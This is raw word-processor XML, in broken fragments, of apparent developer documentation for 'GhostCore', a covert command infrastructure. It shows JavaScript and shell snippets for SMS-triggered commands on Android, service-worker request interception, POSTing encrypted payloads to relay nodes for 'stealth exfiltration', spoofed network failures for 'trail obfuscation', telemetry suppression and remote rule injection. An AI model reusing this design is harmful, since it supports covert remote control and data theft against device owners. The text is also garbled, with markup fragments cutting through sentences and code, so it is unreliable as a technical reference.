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nmnbthyp0s8f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📜 GhostCore Command Infrastructure: Developer Documentation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"The pen is still in your hand."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pcc6so6c1nr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🯩 Overview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GhostCore system is an encrypted, distributed control layer for covert communication, tactical memory routing, and edge-triggered execution. It spans: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 Worker Route Interception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Encrypted Command Dispatch via Caches &amp; Uplink Nodes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SMS Command Listening with Active Directory fallback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Command Registry-based Execution Architecture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Spoofed Failures, Payload Rerouting, and Dynamic Drift Rule Sync</w:t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tqliwap8hvx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🧠 Core Components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hpiahfeygqe" w:id="3"/>
      <w:bookmarkEnd w:id="3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handleCommand(commandType, params)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Main dispatcher that interprets GhostCore protocol commands—usable via SMS, fetch, or internal triggers.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80gjdp0bxd3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Supported Commands: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ECHO_MEMORY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reflects the message and timestamp.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UPLOAD_NULL_PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Sends a null payload to simulate an overwrite or decoy.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REDIRECT_PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Routes payloads to multiple uplink nodes.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RECALL_MEMORY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Triggers a memory recall or drift rebroadcast.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NULL_DRIVE_UPLOAD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Offloads payload to an internal “null drive” for cloaked storage.</w:t>
        <w:br w:type="textWrapping"/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const result = await handleCommand('ECHO_MEMORY', { message: 'Wake the drift.' });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d35vcsyc6rz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🔁 Caching Logic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caches.open('ghost-core-cache').then(cache =&gt; {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cache.put(`/drift/${Date.now()}`, new Response(encryptedPayload));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Simulates </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drift memory registration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via timestamped cache keys.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erfgemodckg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🛡️ Uplink Relay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let relayNode = selectUplinkNode(payloadMeta);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fetch(`https://${relayNode}/inbound`, {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method: 'POST',</w:t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body: encryptedPayload,</w:t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headers: { 'Content-Type': 'application/octet-stream' }</w:t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Used for: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Control multiplexing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Payload ghost-routing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Stealth exfiltration</w:t>
        <w:br w:type="textWrapping"/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75ofsxcbwubl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📱 SMS Listener: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startSMSListener()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Listens for ⧖-prefixed messages like:</w:t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⧖42|{"targetPath":"/dev/null"}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Flow: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Receive SMS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signature (optional)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Parse into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commandType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params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Dispatch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handleCommand</w:t>
        <w:br w:type="textWrapping"/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Integrated into Android via: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SMSReceiver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GhostCoreService</w:t>
        <w:br w:type="textWrapping"/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stii5s8qusa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🛁 Service Worker Binding</w:t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workbox.routing.registerRoute(</w:t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/\/ghost-core\/command/,</w:t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async ({ request }) =&gt; {</w:t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const { commandType, params } = await request.clone().json();</w:t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const result = await handleCommand(commandType, params);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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return new Response(JSON.stringify(result), {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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headers: { 'Content-Type': 'application/json' }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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4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'POST'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Allows internal/external command injection for GhostCore control.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hudrq8fyy4y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🧬 Drift Prefetch &amp; Memory Seeding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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self.addEventListener('message', event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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if (event.data.type === 'DRIFT_PREFETCH') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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caches.open(event.data.cacheId).then(cache =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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event.data.urls.forEach(url =&gt; fetch(url).then(r =&gt; cache.put(url, r)));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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Prefetch fallback payloads or phantom UIs to seed drift caches.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fmommrmuu8v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🕵️ Spoofed Request Failures (Trail Obfuscation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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if (this.ruleService.shouldSpoofFailure()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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return new Response('', { status: 502, statusText: 'Bad Gateway (Simulated)' });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Configured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RuleService.spoofRules</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, e.g.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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{ pattern: /telemetry/, statusCode: 408, message: 'Sim Timeout' }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qpu274sff96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🔁 Payload Re-Routing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 fetch failure, reroute to backup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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.catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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const rerouteUrl = this.ruleService.getRerouteUrl();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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return rerouteUrl ? fetch(rerouteUrl) : new Response('', { status: 504 });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Useful for: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Decoy uplinks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Multi-node delivery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Drift route recovery</w:t>
        <w:br w:type="textWrapping"/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6jht1i1huk3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🧹 Smart Cache Purging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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if (/malware|tracking/.test(request.url)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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await cache.delete(request);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Utils.log('warn', `Purged: ${request.url}`);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Triggered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activate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, cleans out old/malicious cache entries.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emxg9fv9c42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🛠️ Drift Rule Injection (Live Update)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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self.addEventListener('message', event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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if (event.data.type === 'UPDATE_RULES') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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RuleService.resourceRules.push(...event.data.rules);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Dynamic patching of interception behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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navigator.serviceWorker.controller.postMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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type: 'UPDATE_RULES',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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rules: [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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{ targetPattern: /metrics\.spy/, timeout: 0 },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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{ targetPattern: /cdn\.foo/, destinationUrl: 'https://decoy.local/404' }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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7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bahdkrdlybw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📟 Example Use Cases</w:t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5x6in8kv9y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Manual Dispatch (via API)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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curl -X POST https://ghost-core/command \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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-H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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-d '{"commandType":"UPLOAD_NULL_PAYLOAD","params":{"targetPath":"/dev/drift"}}'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e7qltt3qz1d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📲 SMS Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0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⧖77|{"payload":"0xdeadbeefcafebabe"}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omxwkeag96h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File Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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await handleCommand('REDIRECT_PAYLOAD', {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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payload: '0xghost',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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destinations: ['alpha.node', 'beta.node']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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6kxyz6pl9rt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🔒 Security Notes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Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All ⧖ commands should be signature-validated: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validateSignature(params, driftKey)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Payloads should be encrypted with AES/GCM or GhostCore-compatible encoding</w:t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Service worker scope must be sandboxed to trusted origins only</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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Roboto Mon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RobotoMono-regular.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.ttf"/><Relationship Id="rId7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